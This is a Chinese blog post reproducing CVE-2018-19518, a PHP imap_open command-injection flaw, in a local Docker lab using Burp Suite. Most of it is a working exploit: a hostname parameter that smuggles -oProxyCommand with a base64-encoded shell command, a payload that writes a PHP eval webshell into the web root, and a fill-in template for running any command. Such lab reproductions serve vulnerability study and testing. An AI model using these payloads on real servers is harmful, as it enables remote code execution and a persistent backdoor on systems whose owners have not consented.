CVE-2018-19518PHP漏洞

1.启动环境

bash 复制代码
docker-compose up -d

2.访问网站

bash 复制代码
http://192.168.63.156:8080/

3.打开BurpSuite

拦截到访问请求,发送到repeater。修改请求内容

bash 复制代码
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}&username=xxx&password=xxx

执行的命令是

bash 复制代码
echo '1234567890'>/tmp/test0001

进行base64加密后变成

bash 复制代码
ZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQ==

需要转换一下,+(%2b);TAB(%09);=(%3d)

bash 复制代码
ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d

完整的请求

bash 复制代码
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}&username=xxx&password=xxx
bash 复制代码
# 原始payload
x+-oProxyCommand=echo	echo '<?php eval($_POST[1]);' > /var/www/html/1.php|base64	-d|sh}

# base64+url编码以后
hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sLzEucGhw%3d|base64%09-d|sh}

# 模板
hostname=x+-oProxyCommand%3decho%09【要执行命令的base64】|base64%09-d|sh}&username=xxx&password=xxx

这个请求forward以后。

在bash中查看是否创建成功。执行下面命令进入环境bash

bash 复制代码
sudo docker exec -it e78a02c75bd8 /bin/bash

可以看到已经创建成功test0001

参考

https://www.bilibili.com/video/BV1k14y1L7Sj?spm_id_from=333.788.videopod.episodes&vd_source=4677d71876ccb847909253468ef2f55c&p=4

CVE-2018-19518 漏洞复现-CSDN博客

相关推荐
2401_868534787 小时前
企业信息安全建设
linux·网络协议·beautifulsoup
goyeer7 小时前
Liunx日志管理与journalctl
java·linux·运维·服务器·运维开发·信息化·信息化企业管理
酷可达拉斯7 小时前
自动化运维-Ansible Role综合应用案例-基于LNMP部署wordpress
linux·运维·服务器·自动化·ansible
拂拉氏7 小时前
【Linux】 编译与动静态库相关
linux·编译·动静态库
Lonely 净土15 小时前
Linux 运维文件写入操作
linux·运维·服务器·文件管理
吠品18 小时前
Wine 在 Linux 上运行 Windows 软件完整指南
java·linux·服务器
深念Y20 小时前
从 Windows 迁移到 Linux 开发环境的记录
linux·windows·链接·bun·ram·imdisk
知无不研21 小时前
Linux I/O复用之epoll
linux·服务器·epoll·socket编程
fb_123451 天前
Linux运维封神|SELinux详解+CentOS7启动原理+Root密码重置+开机故障排查实战
linux·运维·服务器
苏宸啊1 天前
linux网络编程udp服务器和客户端代码编写(echo版本和字典版本)
linux·网络